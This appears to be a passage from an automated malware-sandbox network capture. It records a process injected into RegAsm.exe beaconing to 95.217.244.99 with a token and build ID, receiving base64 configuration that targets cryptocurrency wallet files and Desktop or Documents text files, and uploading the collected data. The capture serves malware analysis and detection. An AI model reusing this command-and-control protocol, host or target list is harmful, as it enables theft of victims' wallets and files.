                                                                                                                                                                                                                                      2024-04-23 19:44:21 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                                                                                                                                                                      Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                                                                                                                                                                      2024-04-23 19:44:22 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                                                                                                                                                                      Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      16192.168.2.64972695.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:22 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:22 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------IJDHDGDAAAAKFIDGHJDGCont
                                                                                                                                                                                                                                      2024-04-23 19:44:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:23 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      17192.168.2.64972795.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:24 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:24 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------CBFBGCGIJKJJKFIDBFCGCont
                                                                                                                                                                                                                                      2024-04-23 19:44:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:25 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      18192.168.2.64972895.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:25 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJ
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 453
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:25 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------JDGIECGIEBKJJJJKEGHJCont
                                                                                                                                                                                                                                      2024-04-23 19:44:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      19192.168.2.64972995.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:28 UTC265OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFC
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 122813
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:28 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------CBGCBKFBGIIIECAAAKFCCont
                                                                                                                                                                                                                                      2024-04-23 19:44:28 UTC16355OUTData Raw: 73 73 4a 38 36 46 56 4c 48 70 75 34 79 78 7a 6e 48 46 58 5a 50 45 46 70 44 64 33 56 74 49 72 71 39 76 47 30 6a 59 64 47 79 42 6a 50 41 59 6b 64 52 39 34 43 67 44 56 6f 72 4a 2f 74 61 63 36 6a 61 51 66 59 4a 6b 69 6e 69 64 32 5a 6d 6a 4a 58 42 47 44 6b 4f 52 6a 42 7a 78 6e 71 50 65 6e 36 5a 72 74 6e 71 30 30 6b 64 73 53 53 69 37 67 64 36 48 63 4d 34 7a 68 57 4a 48 30 59 41 2b 31 41 47 6e 52 57 4c 64 36 79 7a 57 4d 73 39 74 46 4d 69 78 58 43 52 2b 5a 68 47 44 2f 76 41 72 41 41 45 6e 50 58 71 41 65 61 6e 47 74 52 6d 4d 2f 77 43 69 33 50 32 67 54 65 54 39 6d 77 75 38 74 74 33 64 64 32 33 47 33 6e 4f 61 41 4e 4f 69 73 73 36 30 68 45 53 78 57 64 31 4a 4e 49 48 2f 41 48 53 68 51 79 6c 43 41 77 4f 57 41 34 4a 39 61 6a 73 39 61 6b 6e 30 2b 30 6c 6b 73 70 6d 75 72
                                                                                                                                                                                                                                      Data Ascii: ssJ86FVLHpu4yxznHFXZPEFpDd3VtIrq9vG0jYdGyBjPAYkdR94CgDVorJ/tac6jaQfYJkinid2ZmjJXBGDkORjBzxnqPen6Zrtnq00kdsSSi7gd6HcM4zhWJH0YA+1AGnRWLd6yzWMs9tFMixXCR+ZhGD/vArAAEnPXqAeanGtRmM/wCi3P2gTeT9mwu8tt3dd23G3nOaANOiss60hESxWd1JNIH/AHShQylCAwOWA4J9ajs9akn0+0lkspmur
                                                                                                                                                                                                                                      2024-04-23 19:44:28 UTC16355OUTData Raw: 64 4e 7a 43 34 59 4e 49 66 75 34 7a 6b 63 63 59 48 70 55 76 2f 43 63 2b 47 50 2b 67 33 61 66 39 39 30 66 38 4a 7a 34 58 2f 36 44 64 70 2f 33 33 52 79 53 37 42 7a 78 37 68 64 65 45 62 4b 2f 76 70 4c 6d 2f 75 62 6d 36 52 72 56 37 52 49 48 45 61 72 48 47 34 41 59 42 6c 51 50 7a 6a 75 78 47 54 6e 30 78 6f 36 56 70 30 2b 6d 77 4e 46 4e 71 74 37 71 41 34 43 74 64 69 4c 4b 41 44 6f 44 47 69 35 2f 48 4a 72 4f 2f 77 43 45 35 38 4c 2f 41 50 51 62 74 50 38 41 76 75 6a 2f 41 49 54 6e 77 76 38 41 39 42 75 30 2f 77 43 2b 36 4f 53 58 59 4f 65 50 63 36 43 69 75 66 38 41 2b 45 35 38 4c 2f 38 41 51 62 74 50 2b 2b 36 50 2b 45 35 38 4c 2f 38 41 51 62 74 50 2b 2b 36 4f 53 58 59 4f 65 50 63 36 43 69 75 66 2f 77 43 45 35 38 4c 2f 41 50 51 62 74 50 38 41 76 75 6a 2f 41 49 54 6e
                                                                                                                                                                                                                                      Data Ascii: dNzC4YNIfu4zkccYHpUv/Cc+GP+g3af990f8Jz4X/6Ddp/33RyS7Bzx7hdeEbK/vpLm/ubm6RrV7RIHEarHG4AYBlQPzjuxGTn0xo6Vp0+mwNFNqt7qA4CtdiLKADoDGi5/HJrO/wCE58L/APQbtP8Avuj/AITnwv8A9Bu0/wC+6OSXYOePc6Ciuf8A+E58L/8AQbtP++6P+E58L/8AQbtP++6OSXYOePc6Ciuf/wCE58L/APQbtP8Avuj/AITn
                                                                                                                                                                                                                                      2024-04-23 19:44:28 UTC16355OUTData Raw: 78 2f 38 41 78 4e 48 2f 41 41 6d 58 69 48 2f 6f 4a 48 2f 76 7a 48 2f 38 54 58 6a 66 32 54 69 65 79 2b 38 2b 6a 2f 74 37 42 39 33 39 78 36 33 58 6d 66 78 43 2f 77 43 52 69 68 2f 36 39 45 2f 39 44 65 71 48 2f 43 5a 65 49 66 38 41 6f 4a 48 2f 41 4c 38 78 2f 77 44 78 4e 5a 6d 6f 61 6c 65 61 70 63 43 34 76 5a 6a 4e 4b 45 43 42 74 6f 58 35 51 53 63 63 41 44 75 61 36 73 46 6c 31 65 6a 58 6a 55 6e 73 72 2f 6b 63 4f 5a 5a 76 68 73 52 68 5a 55 71 62 64 33 62 70 35 70 6c 57 6a 74 52 52 58 76 6e 79 67 6c 46 4c 69 6b 6f 47 46 46 46 46 41 42 52 52 52 51 41 55 6c 4c 53 55 44 43 69 69 69 67 41 70 4b 57 69 67 42 4b 4b 4b 4b 41 43 69 69 69 67 59 55 55 55 55 41 49 61 4b 4d 30 55 44 43 6b 70 61 4b 41 45 6f 70 61 53 6d 41 6c 46 4c 53 55 44 43 6b 70 61 4d 55 44 45 6f 70 63 55
                                                                                                                                                                                                                                      Data Ascii: x/8AxNH/AAmXiH/oJH/vzH/8TXjf2Tiey+8+j/t7B939x63XmfxC/wCRih/69E/9DeqH/CZeIf8AoJH/AL8x/wDxNZmoaleapcC4vZjNKECBtoX5QSccADua6sFl1ejXjUnsr/kcOZZvhsRhZUqbd3bp5plWjtRRXvnyglFLikoGFFFFABRRRQAUlLSUDCiiigApKWigBKKKKACiiigYUUUUAIaKM0UDCkpaKAEopaSmAlFLSUDCkpaMUDEopcU
                                                                                                                                                                                                                                      2024-04-23 19:44:28 UTC16355OUTData Raw: 4d 48 2b 33 2b 56 46 6d 46 69 31 4b 4d 32 64 31 2f 31 79 2f 71 4b 7a 39 4e 4f 4a 32 2f 33 61 66 4a 71 4d 52 74 35 55 54 64 6c 31 32 38 6a 33 42 71 74 5a 33 43 57 38 72 4d 2b 63 46 63 63 55 52 69 30 6d 4b 78 72 30 56 56 2f 74 43 33 78 31 66 38 71 54 2b 30 62 66 38 41 76 4e 2b 56 46 6d 4f 78 62 7a 53 35 71 6e 2f 61 46 74 6e 37 7a 2f 6c 53 2f 77 42 6f 32 33 39 35 76 2b 2b 61 4c 4d 4c 46 71 67 39 4b 71 66 32 6a 61 2f 33 6d 2f 77 43 2b 61 50 37 53 74 76 37 7a 66 39 38 30 57 59 37 46 75 69 71 6e 39 6f 32 33 39 35 2f 2b 2b 61 50 37 52 74 76 37 7a 2f 38 41 66 4e 46 6d 46 6d 57 38 2b 6c 4c 56 4d 61 6c 61 2f 77 42 35 2f 77 44 76 6d 6c 2f 74 4b 31 2f 76 50 2f 33 7a 52 5a 39 68 57 5a 61 70 61 71 66 32 6c 61 48 48 7a 50 38 41 39 38 30 66 32 6c 61 66 33 6e 2f 37 35 70
                                                                                                                                                                                                                                      Data Ascii: MH+3+VFmFi1KM2d1/1y/qKz9NOJ2/3afJqMRt5UTdl128j3BqtZ3CW8rM+cFccURi0mKxr0VV/tC3x1f8qT+0bf8AvN+VFmOxbzS5qn/aFtn7z/lS/wBo2395v++aLMLFqg9Kqf2ja/3m/wC+aP7Stv7zf980WY7Fuiqn9o2395/++aP7Rtv7z/8AfNFmFmW8+lLVMala/wB5/wDvml/tK1/vP/3zRZ9hWZapaqf2laHHzP8A980f2laf3n/75p
                                                                                                                                                                                                                                      2024-04-23 19:44:28 UTC16355OUTData Raw: 42 2b 6f 2f 70 30 72 70 4f 32 4f 77 6c 42 70 65 6c 4e 36 2f 34 30 69 78 4f 70 6f 36 30 45 30 64 2f 57 67 6f 53 67 6a 38 61 50 38 61 53 67 41 2f 4b 6d 35 34 70 63 63 2f 38 41 31 71 51 39 4f 74 49 61 44 70 37 2f 41 49 30 6e 38 36 4f 53 50 77 6f 70 44 44 50 35 55 68 35 4e 42 35 70 44 30 6f 47 68 65 4b 51 2f 54 70 52 31 70 44 30 6f 47 4a 52 31 4e 48 41 6f 78 31 2f 70 51 4d 37 75 35 67 75 47 64 6e 74 70 49 46 4d 6b 52 68 6b 57 65 42 4a 6b 64 43 51 32 43 72 71 77 50 49 42 36 64 71 7a 4a 64 43 75 62 70 37 6e 37 58 65 43 57 4b 36 61 4a 70 6f 2f 4c 55 4c 2b 37 42 43 42 51 42 38 6f 55 4d 51 46 58 41 35 36 56 75 30 56 78 54 77 6c 47 70 4c 6e 6c 47 37 50 6e 4b 57 59 59 6d 6c 54 39 6e 43 62 53 4d 69 36 30 33 55 4c 31 46 74 72 6e 55 6d 6b 73 31 67 53 32 45 62 52 72 6e
                                                                                                                                                                                                                                      Data Ascii: B+o/p0rpO2OwlBpelN6/40ixOpo60E0d/WgoSgj8aP8aSgA/Km54pcc/8A1qQ9OtIaDp7/AI0n86OSPwopDDP5Uh5NB5pD0oGheKQ/TpR1pD0oGJR1NHAox1/pQM7u5guGdntpIFMkRhkWeBJkdCQ2CrqwPIB6dqzJdCubp7n7XeCWK6aJpo/LUL+7BCBQB8oUMQFXA56Vu0VxTwlGpLnlG7PnKWYYmlT9nCbSMi603UL1FtrnUmks1gS2EbRrn
                                                                                                                                                                                                                                      2024-04-23 19:44:28 UTC16355OUTData Raw: 72 6d 65 4f 2b 73 37 6e 37 4e 67 7a 70 62 75 78 5a 42 6e 47 63 6c 51 47 41 4a 41 4a 55 73 4f 66 54 6d 6a 36 31 52 76 62 6d 44 2b 7a 38 54 61 2f 49 79 53 69 6f 4a 4c 6c 59 70 64 51 52 6d 69 4a 73 4c 6c 62 61 62 44 48 6c 32 33 59 78 78 30 2b 51 39 63 56 4f 6f 4c 7a 77 51 71 56 44 7a 79 72 45 6d 34 34 47 35 6a 67 5a 71 34 56 36 63 34 75 55 58 6f 6a 4f 70 68 71 74 4f 53 68 4f 4e 6d 77 70 47 47 35 53 50 55 59 71 47 33 75 6f 4c 6e 54 6f 62 75 4f 37 74 53 38 38 45 74 78 46 62 62 33 38 32 52 49 69 77 63 6a 35 64 76 47 78 6a 6a 64 6e 41 70 66 50 38 41 33 59 6b 4a 6a 32 4e 44 44 4a 47 63 6b 2b 59 30 71 68 6f 34 31 41 47 53 35 42 36 44 6a 31 4f 4b 79 65 4c 77 38 6b 34 38 78 30 4c 4c 73 5a 54 6b 70 63 6a 75 6a 76 66 2b 46 6a 50 2f 41 4e 41 68 66 2f 41 72 2f 77 43 77
                                                                                                                                                                                                                                      Data Ascii: rmeO+s7n7NgzpbuxZBnGclQGAJAJUsOfTmj61RvbmD+z8Ta/IySioJLlYpdQRmiJsLlbabDHl23Yxx0+Q9cVOoLzwQqVDzyrEm44G5jgZq4V6c4uUXojOphqtOShONmwpGG5SPUYqG3uoLnTobuO7tS88EtxFbb382RIiwcj5dvGxjjdnApfP8A3YkJj2NDDJGck+Y0qho41AGS5B6Dj1OKyeLw8k48x0LLsZTkpcjujvf+FjP/ANAhf/Ar/wCw
                                                                                                                                                                                                                                      2024-04-23 19:44:28 UTC8328OUTData Raw: 41 50 37 4d 2f 76 66 68 2f 77 41 45 39 43 36 6d 69 76 50 61 53 6c 2f 61 2f 77 44 63 2f 48 2f 67 42 2f 5a 6e 39 37 38 50 2b 43 65 68 55 56 35 37 52 54 2f 74 66 2b 35 2b 50 2f 41 48 2f 5a 76 39 37 38 50 2b 43 65 67 6d 69 76 50 71 4b 50 37 58 2f 75 66 6a 2f 77 41 41 50 37 4e 2f 76 66 68 2f 77 54 30 43 67 31 77 41 42 4a 41 41 4a 4a 34 41 46 61 38 76 68 4c 78 4a 42 4c 46 46 4e 34 65 31 57 4f 53 62 50 6c 4b 39 6c 49 43 2b 42 6b 37 51 52 7a 67 63 38 64 71 58 39 73 66 33 50 78 2f 34 41 31 6c 76 39 37 38 50 2b 43 64 4f 66 2f 31 55 56 77 71 32 74 77 39 72 4a 64 4a 42 4b 31 76 45 77 57 53 55 49 53 69 45 35 77 43 65 67 4a 77 63 66 51 31 62 76 4e 42 31 6a 54 72 4b 4b 38 76 74 4a 76 72 61 31 6c 77 49 35 35 37 64 30 52 38 6a 49 77 78 47 44 6b 63 30 66 32 76 2f 41 48 50
                                                                                                                                                                                                                                      Data Ascii: AP7M/vfh/wAE9C6mivPaSl/a/wDc/H/gB/Zn978P+CehUV57RT/tf+5+P/AH/Zv978P+CegmivPqKP7X/ufj/wAAP7N/vfh/wT0Cg1wABJAAJJ4AFa8vhLxJBLFFN4e1WOSbPlK9lIC+Bk7QRzgc8dqX9sf3Px/4A1lv978P+CdOf/1UVwq2tw9rJdJBK1vEwWSUISiE5wCegJwcfQ1bvNB1jTrKK8vtJvra1lwI557d0R8jIwxGDkc0f2v/AHP
                                                                                                                                                                                                                                      2024-04-23 19:44:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      20192.168.2.64973095.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
